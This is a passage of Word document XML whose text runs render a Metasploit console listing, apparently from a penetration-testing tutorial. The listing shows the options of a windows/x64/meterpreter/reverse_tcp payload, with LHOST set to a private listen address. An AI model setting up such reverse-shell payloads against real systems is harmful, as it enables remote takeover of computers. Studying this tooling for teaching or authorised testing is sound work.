          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EXITFUNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Accepted:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>seh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>proce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>specifi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
